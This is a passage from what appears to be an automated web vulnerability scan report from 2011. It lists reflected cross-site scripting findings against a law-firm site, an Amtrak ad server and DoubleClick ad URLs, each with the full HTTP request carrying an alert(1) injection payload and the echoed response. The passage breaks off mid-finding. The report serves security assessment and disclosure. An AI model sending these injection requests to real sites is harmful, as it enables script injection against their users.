<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/favicon.icof79e7"><script>alert(1)</script>1553382093a');" title="Email Page">
...[SNIP]...

4.2. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74711"><script>alert(1)</script>5c2b4746530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript74711"><script>alert(1)</script>5c2b4746530/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.3. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://207.56.166.97
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e62"><script>alert(1)</script>08c4388e43e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e HTTP/1.1
Host: 207.56.166.97
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://207.56.166.97/javascript/c_smartmenus.js34e62"><script>alert(1)</script>08c4388e43e');" title="Email Page">
...[SNIP]...

4.4. http://ad.amtk-media.com/iframe [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25012"><script>alert(1)</script>0614a672642 was submitted in the @CPSC@ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=25012"><script>alert(1)</script>0614a672642 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423009; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=25012"><script>alert(1)</script>0614a672642http://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.5. http://ad.amtk-media.com/iframe [@CPSC@ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the @CPSC@ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191ab'%3balert(1)//d0c8695572d was submitted in the @CPSC@ parameter. This input was echoed as 191ab';alert(1)//d0c8695572d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=191ab'%3balert(1)//d0c8695572d HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423011; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4559
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
e('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_multiclick=clickTAG1&click=191ab';alert(1)//d0c8695572dhttp://www.amtrak.com/servlet/ContentServer?ff=Yes&c=AM_Content_C&pagename=am%2FLayout&p=1237405732514&cid=1248543358139&WT.mc_t=DiscoverAmerica&WT.mc_t=ACLWSPFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
...[SNIP]...

4.6. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b203b'-alert(1)-'669cb54d170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&b203b'-alert(1)-'669cb54d170=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423027; expires=Sat, 11 May 2013 23:37:21 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:21 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4308
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&ml_multiclick=clickTAG1&click=&b203b'-alert(1)-'669cb54d170=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60');
clickTAGs += '&swfPATH=' + escape('http://ad.amtk-media.com/xl/PROD/17298
...[SNIP]...

4.7. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 986e2"><script>alert(1)</script>7e56d92a0c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=&986e2"><script>alert(1)</script>7e56d92a0c0=1 HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:20 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131423020; expires=Sat, 11 May 2013 23:37:20 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:20 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4355
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...
<A TARGET="_blank" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2109892&click=&986e2"><script>alert(1)</script>7e56d92a0c0=1http://www.amtrak.com/servlet/ContentServer?pagename=Amtrak/HomePage&WT.mc_t=ACLFFY11&WT.mc_n=Bloomberg728X90&WT.mc_r=60">
...[SNIP]...

4.8. http://ad.amtk-media.com/iframe [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaf39"><script>alert(1)</script>7af5e74697d was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blankaaf39"><script>alert(1)</script>7af5e74697d&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:18 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422991; expires=Sat, 11 May 2013 23:37:18 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:18 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4604
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
<A TARGET="_blankaaf39"><script>alert(1)</script>7af5e74697d" HREF="http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&click=http://www.amtrak.c
...[SNIP]...

4.9. http://ad.amtk-media.com/iframe [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971a3'%3balert(1)//62435de2831 was submitted in the target parameter. This input was echoed as 971a3';alert(1)//62435de2831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank971a3'%3balert(1)//62435de2831&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:19 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422997; expires=Sat, 11 May 2013 23:37:19 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:19 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4557
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&t
...[SNIP]...
s/amt_acl_plug_f_728x90_arn.dir/amt_acl_plug_f_728x90_arn.swf';
var flash_name= '"' + swf_name + '"';
var swfVer= 90/10;
var swfMime= 'application/x-shockwave-flash';
var clickTAGs= 'clickTARGET=_blank971a3';alert(1)//62435de2831' + '&clickTAG=' + escape('http://ad.amtk-media.com/click.ng?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1091925&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2107089&ml_camp=1090498&ml_crid=2128670&ml_mul
...[SNIP]...

4.10. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df75a"-alert(1)-"b55e37a950c was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3df75a"-alert(1)-"b55e37a950c&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.11. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce0c'-alert(1)-'8511ba05b59 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3fce0c'-alert(1)-'8511ba05b59&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.12. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6341e"-alert(1)-"0ee272f6ed was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6457

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Mar 28 14:24:17 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
1409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt16341e"-alert(1)-"0ee272f6ed&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var w
...[SNIP]...

4.13. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b0f4'-alert(1)-'e7171bb264d was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

